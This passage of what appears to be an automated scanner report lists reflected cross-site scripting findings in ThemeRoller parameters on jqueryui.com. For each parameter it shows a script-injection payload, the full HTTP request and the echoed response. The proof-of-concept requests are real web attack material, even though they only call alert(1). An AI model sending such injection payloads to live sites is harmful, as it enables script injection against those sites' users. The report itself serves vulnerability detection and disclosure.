The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65dce"><script>alert(1)</script>342604bc65a was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d65dce"><script>alert(1)</script>342604bc65a&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
acityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d65dce"><script>alert(1)</script>342604bc65a&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_
...[SNIP]...

2.30. http://jqueryui.com/themeroller/ [fcHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2ca0"><script>alert(1)</script>6d87ea1e80f was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000e2ca0"><script>alert(1)</script>6d87ea1e80f&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000e2ca0"><script>alert(1)</script>6d87ea1e80f&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextu
...[SNIP]...

2.31. http://jqueryui.com/themeroller/ [fcHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78ffc"><script>alert(1)</script>ec3f127d024 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=02689078ffc"><script>alert(1)</script>ec3f127d024&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=02689078ffc"><script>alert(1)</script>ec3f127d024&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHigh
...[SNIP]...

2.32. http://jqueryui.com/themeroller/ [ffDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e22cb"><script>alert(1)</script>23c4849ca03 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serife22cb"><script>alert(1)</script>23c4849ca03&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serife22cb"><script>alert(1)</script>23c4849ca03&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorCon
...[SNIP]...

2.33. http://jqueryui.com/themeroller/ [fsDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edaa6"><script>alert(1)</script>7ec91e0b459 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11pxedaa6"><script>alert(1)</script>7ec91e0b459&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11pxedaa6"><script>alert(1)</script>7ec91e0b459&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_
...[SNIP]...

2.34. http://jqueryui.com/themeroller/ [fwDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40452"><script>alert(1)</script>0126ccf0dc5 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal40452"><script>alert(1)</script>0126ccf0dc5&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120077

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal40452"><script>alert(1)</script>0126ccf0dc5&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTex
...[SNIP]...

2.35. http://jqueryui.com/themeroller/ [iconColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38826"><script>alert(1)</script>b0a7543aeea was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d38826"><script>alert(1)</script>b0a7543aeea&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d38826"><script>alert(1)</script>b0a7543aeea&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

2.36. http://jqueryui.com/themeroller/ [iconColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba0ca"><script>alert(1)</script>197613e1c54 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469dba0ca"><script>alert(1)</script>197613e1c54&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469dba0ca"><script>alert(1)</script>197613e1c54&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityAct
...[SNIP]...

2.37. http://jqueryui.com/themeroller/ [iconColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e834e"><script>alert(1)</script>35999343801 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3e834e"><script>alert(1)</script>35999343801&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3e834e"><script>alert(1)</script>35999343801&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&
...[SNIP]...

2.38. http://jqueryui.com/themeroller/ [iconColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 787cd"><script>alert(1)</script>b71538a521f was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

